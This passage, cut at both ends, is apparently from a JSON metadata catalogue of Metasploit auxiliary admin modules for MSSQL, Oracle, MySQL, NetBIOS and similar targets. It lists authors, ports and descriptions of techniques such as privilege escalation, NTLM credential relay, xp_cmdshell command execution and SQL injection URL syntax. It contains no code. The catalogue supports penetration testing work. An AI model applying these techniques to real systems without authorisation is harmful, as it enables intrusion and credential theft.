"description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_sql_logins",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_dbowner": {
"name": "Microsoft SQL Server Escalate Db_Owner",
"full_name": "auxiliary/admin/mssql/mssql_escalate_dbowner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Db_Owner",
"full_name": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_execute_as": {
"name": "Microsoft SQL Server Escalate EXECUTE AS",
"full_name": "auxiliary/admin/mssql/mssql_escalate_execute_as",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Execute AS",
"full_name": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_exec": {
"name": "Microsoft SQL Server xp_cmdshell Command Execution",
"full_name": "auxiliary/admin/mssql/mssql_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will execute a Windows command on a MSSQL/MSDE instance\n via the xp_cmdshell procedure. A valid username and password is required\n to use this module",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_findandsampledata": {
"name": "Microsoft SQL Server Find and Sample Data",
"full_name": "auxiliary/admin/mssql/mssql_findandsampledata",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Scott Sutherland <scott.sutherland@netspi.com>",
"Robin Wood <robin@digininja.org>",
"humble-desser <humble.desser@gmail.com>",
"Carlos Perez <carlos_perez@darkoperator.com>",
"hdm <x@hdm.io>",
"todb <todb@metasploit.com>"
],
"description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.",
"references": [
"URL-http://www.netspi.com/blog/author/ssutherland/"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_findandsampledata",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_idf": {
"name": "Microsoft SQL Server Interesting Data Finder",
"full_name": "auxiliary/admin/mssql/mssql_idf",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Wood <robin@digininja.org>"
],
"description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n The module has been tested against SQL Server 2005 but it should also work on\n SQL Server 2008. The module will not work against SQL Server 2000 at this time,\n if you are interested in supporting this platform, please contact the author.",
"references": [
"URL-http://www.digininja.org/metasploit/mssql_idf.php"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_idf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_ntlm_stealer": {
"name": "Microsoft SQL Server NTLM Stealer",
"full_name": "auxiliary/admin/mssql/mssql_ntlm_stealer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.",
"references": [
"URL-http://en.wikipedia.org/wiki/SMBRelay"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": {
"name": "Microsoft SQL Server SQLi NTLM Stealer",
"full_name": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"Antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.",
"references": [
"URL-http://en.wikipedia.org/wiki/SMBRelay"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_sql": {
"name": "Microsoft SQL Server Generic Query",
"full_name": "auxiliary/admin/mssql/mssql_sql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.",
"references": [
"URL-http://www.attackresearch.com",
"URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_sql_file": {
"name": "Microsoft SQL Server Generic Query from File",
"full_name": "auxiliary/admin/mssql/mssql_sql_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j0hn__f : <jf@tinternet.org.uk>"
],
"description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mysql/mysql_enum": {
"name": "MySQL Enumeration Module",
"full_name": "auxiliary/admin/mysql/mysql_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.",
"references": [
"URL-https://cisecurity.org/benchmarks.html"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mysql/mysql_sql": {
"name": "MySQL SQL Generic Query",
"full_name": "auxiliary/admin/mysql/mysql_sql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>"
],
"description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/natpmp/natpmp_map": {
"name": "NAT-PMP Port Mapper",
"full_name": "auxiliary/admin/natpmp/natpmp_map",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
"is_install_path": true,
"ref_name": "admin/natpmp/natpmp_map",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/netbios/netbios_spoof": {
"name": "NetBIOS Response Brute Force Spoof (Direct)",
"full_name": "auxiliary/admin/netbios/netbios_spoof",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"vvalien",
"hdm <x@hdm.io>",
"tombkeeper"
],
"description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.",
"references": [
],
"platform": "",
"arch": "",
"rport": 137,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb",
"is_install_path": true,
"ref_name": "admin/netbios/netbios_spoof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/officescan/tmlisten_traversal": {
"name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",
"full_name": "auxiliary/admin/officescan/tmlisten_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Anshul Pandey <anshul999@gmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests for directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.",
"references": [
"OSVDB-48730",
"CVE-2008-2439",
"BID-31531",
"URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt"
],
"platform": "",
"arch": "",
"rport": 26122,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
"is_install_path": true,
"ref_name": "admin/officescan/tmlisten_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/ora_ntlm_stealer": {
"name": "Oracle SMB Relay Code Execution",
"full_name": "auxiliary/admin/oracle/ora_ntlm_stealer",
"rank": 300,
"disclosure_date": "2009-04-07",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsecrg.com>"
],
"description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server which\n runs Oracle. If not than you can decrypt HALFLM hash.",
"references": [
"URL-http://dsecrg.com/pages/pub/show.php?id=17"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/oracle/ora_ntlm_stealer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_index_privesc": {
"name": "Oracle DB Privilege Escalation via Function-Based Index",
"full_name": "auxiliary/admin/oracle/oracle_index_privesc",
"rank": 300,
"disclosure_date": "2015-01-21",
"type": "auxiliary",
"author": [
"David Litchfield",
"Moshe Kaplan"
],
"description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.",
"references": [
"URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-10 11:21:16 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_index_privesc",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_login": {
"name": "Oracle Account Discovery",
"full_name": "auxiliary/admin/oracle/oracle_login",
"rank": 300,
"disclosure_date": "2008-11-20",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.",
"references": [
"URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv",
"URL-https://seclists.org/fulldisclosure/2009/Oct/261"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_login.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_sql": {
"name": "Oracle SQL Generic Query",
"full_name": "auxiliary/admin/oracle/oracle_sql",
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.",
"references": [
"URL-https://www.metasploit.com/users/mc"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_sql.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_sql",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oraenum": {
"name": "Oracle Database Enumeration",
"full_name": "auxiliary/admin/oracle/oraenum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.",
"references": [
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/oraenum.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oraenum",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr": {
"name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr",
"rank": 300,
"disclosure_date": "2009-01-14",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.",
"references": [
"CVE-2008-5448",
"OSVDB-51342",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html",
"ZDI-09-003"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr2": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr2",
"rank": 300,
"disclosure_date": "2009-08-18",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
"references": [
"CVE-2009-1977",
"OSVDB-55903",
"CVE-2009-1978",
"OSVDB-55904",
"ZDI-09-058",
"ZDI-09-059"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr3": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr3",
"rank": 300,
"disclosure_date": "2010-07-13",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
"references": [
"CVE-2010-0904",
"OSVDB-66338",
"ZDI-10-118"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/post_exploitation/win32exec": {
"name": "Oracle Java execCommand (Win32)",
"full_name": "auxiliary/admin/oracle/post_exploitation/win32exec",
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will create a java class which enables the execution of OS commands.",
"references": [
"URL-https://www.metasploit.com/users/mc"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/post_exploitation/win32upload": {
"name": "Oracle URL Download",
"full_name": "auxiliary/admin/oracle/post_exploitation/win32upload",
"rank": 300,
"disclosure_date": "2005-02-10",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.",
"references": [
"URL-http://www.argeniss.com/research/oraclesqlinj.zip"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32upload",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/sid_brute": {
"name": "Oracle TNS Listener SID Brute Forcer",
"full_name": "auxiliary/admin/oracle/sid_brute",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply attempts to discover the protected SID.",
"references": [
"URL-https://www.metasploit.com/users/mc",
"URL-http://www.red-database-security.com/scripts/sid.txt"
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/sid_brute.rb",
"is_install_path": true,
"ref_name": "admin/oracle/sid_brute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/tnscmd": {
"name": "Oracle TNS Listener Command Issuer",
"full_name": "auxiliary/admin/oracle/tnscmd",
"rank": 300,
"disclosure_date": "2009-02-01",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/tnscmd.rb",
"is_install_path": true,
"ref_name": "admin/oracle/tnscmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/pop2/uw_fileretrieval": {
"name": "UoW pop2d Remote File Retrieval Vulnerability",
"full_name": "auxiliary/admin/pop2/uw_fileretrieval",
"rank": 300,
"disclosure_date": "2000-07-14",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.",
"references": [
"OSVDB-368",
"BID-1484"
],
"platform": "",
"arch": "",
"rport": 109,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb",
"is_install_path": true,
"ref_name": "admin/pop2/uw_fileretrieval",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/postgres/postgres_readfile": {
"name": "PostgreSQL Server Generic Query",
"full_name": "auxiliary/admin/postgres/postgres_readfile",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.",
"references": [
],
"platform": "",
"arch": "",
